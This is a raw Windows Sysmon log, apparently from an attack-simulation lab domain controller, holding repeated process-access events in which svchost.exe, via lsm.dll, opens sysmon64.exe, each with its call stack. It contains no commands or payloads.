13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 